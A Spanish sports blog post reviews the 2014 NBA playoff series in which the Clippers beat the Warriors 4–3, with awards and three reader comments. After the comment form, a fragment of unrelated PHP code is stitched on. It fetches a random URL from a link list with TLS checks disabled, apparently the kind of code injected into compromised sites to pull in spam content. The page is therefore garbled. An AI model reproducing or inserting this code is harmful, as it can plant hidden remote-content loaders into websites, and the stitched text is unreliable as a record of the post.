PO 2014: Resumen Los Angeles Clippers 4 – Golden State Warriors 3

05 de May de 2014 por txusma

“We are one”.

Lo más importante de la serie sucedió fuera de las canchas. Unas conversaciones telefónicas del propietario de los Clippers, Donald Sterling, en las que pedía a su novia no traer amigos negros a su pabellón, se hicieron públicas e iniciaron un tsunami que acabó con una multa astronómica y una suspensión de por vida. Por el medio hubo amenazas de boicot, declaraciones de Barack Obama, comentarios de jugadores, suspensiones de contratos publicitarios… Un entorno complicadísimo si te estás jugando superar una primera ronda de playoffs.

Doc Rivers se ha erigido no solo en el líder del equipo sinó prácticamente de toda la franquicia tras el adiós de Sterling. Ha sabido gestionar la crisis y ha logrado aislar lo suficiente a sus jugadores para que no se vieran más afectados y distraidos de lo humanamente posible. Comentábamos en la previa que el juego interior de los Clippers era superior pero que había que ver cómo respondía Griffin a las provocaciones y qué haría Jordan sin un center de referencia en el equipo contrario. Blake recibió de lindo pero ha vuelto a demostrar en esta serie ese salto adelante que ha dado este año. Por su parte, DeAndre Jordan ha hecho de las zonas su coto privado. Cuando la pareja interior de los Clippers ha sido dominante el equipo ha ganado. 

Por su parte los Warriors han impuesto su mejor juego exterior pero no lo suficiente. Stephen Curry ha estado bien pero no excelso y el resto ha respondido solo a medias. A pesar de ello y de jugar sin Andrew Bogut, han exigido a los Clippers hasta jugarse el pase en un séptimo partido, algo que debería preocupar a los angelinos. Si el año pasado fue el del descubrimiento de Harrison Barnes este lo ha sido de Draymond Green del que servidor se declara ferviente seguidor. Su energía y acierto fue clave en el sexto partido y casi lo es de nuevo en el séptimo. No tiene el techo de Barnes pero es uno de esos jugadores que todos queremos tener en nuestros equipos.

En la previa también avisamos de la creciente “rivalidad” entre Clippers y Warriors y esta serie, aunque se ha mantenido más o menos tranquila en los 7 partidos, se cerró con un altercado entre jugadores de ambos equipos en los vestuarios del Staples Center al final del séptimo partido. Los jugadores de los Warriors ya han declarado que Chris Paul, tan bueno cuando se pone a jugar, les pone rebiosos. Como a muchos…

PREMIOS

MVP: Nos quedamos con la dupla interior de los Clippers. Si Blake Griffin ha promediado 23.3 puntos, 6.3 rebotes, 3.6 asistencias y 1.57 robos, DeAndre Jordan se ha ido a los 12.1 puntos, 15.1 rebotes y4 tapones por partido. Juntos ha conseguido ser imparables en más de un partido.

Sorpresa: Draymond Green (11.9 p- 8.3 r – 1.7 rb – 1.7 t) ha acabado saliendo de titular y cuajó grandes actuaciones en los últimos partidos de la serie. En el sexto se fue a 14 puntos, 14 rebotes y 5 robos y en el séptimo a 24 puntos, 7 rebotes, 2 robos y 2 tapones. JJ Redick (14.3 p) ha aportado justo lo que se esperaba de él cuando se le fichó. Es muy importante para este equipo.

Decepción: Algo más esperarán los Clippers de Glen Davis y Danny Granger, fichados a media temporada pensando claramente en los playoffs. Si quieren avanzar tendrán que mejorar bastante.

Esfuerzo en vano: 23 puntos, 8.4 asistencias, 1.7 robos… Buenos números para Stephen Curry pero no lo suficiente para mantener vivos a los Warriors.

 

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    No sé, a mí me parece preocupante para los Clippers. Tienen un entrenador muy superior; tienen un juego interior potentísimo; tienen al mejor base del mundo; jugaban contra un equipo sin pívots que tampoco ha estado especialmente acertado. Y la serie se decide en el séptimo y con polémica en el tercer partido de la serie.

    Algo les falta a los Clippers para ser candidatos, a ver si dan con ello.

      Citar

  2. TheDeerHunter dice:
    #2

    No sólo hubo polémica en el tercero. También la hubo en el primero y no a favor.
    Tampoco pretendo justificarles, pero han debido pasarlo fatal por el entorno y los Warriors son un equipo incómodo.

    Candidatos son los que han demostrado serlo, Spurs y Thunder. Clippers y Blazers son simples aspirantes pero creo q se han ganado a pulso una consideración.

      Citar

  3. Denise dice:
    #3

    MagicJohnson32:
    No sé, a mí me parece preocupante para los Clippers. Tienen un entrenador muy superior; tienen un juego interior potentísimo; tienen al mejor base del mundo; jugaban contra un equipo sin pívots que tampoco ha estado especialmente acertado. Y la serie se decide en el séptimo y con polémica en el tercer partido de la serie.

    Algo les falta a los Clippers para ser candidatos, a ver si dan con ello.

    Bueno, el lio de Sterling tambien cuenta, y los Warriors aun sin Bogut son un equipazo. Contra los Thunder, veo a los Clippers superfavoritos, y les doy un 4-1

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>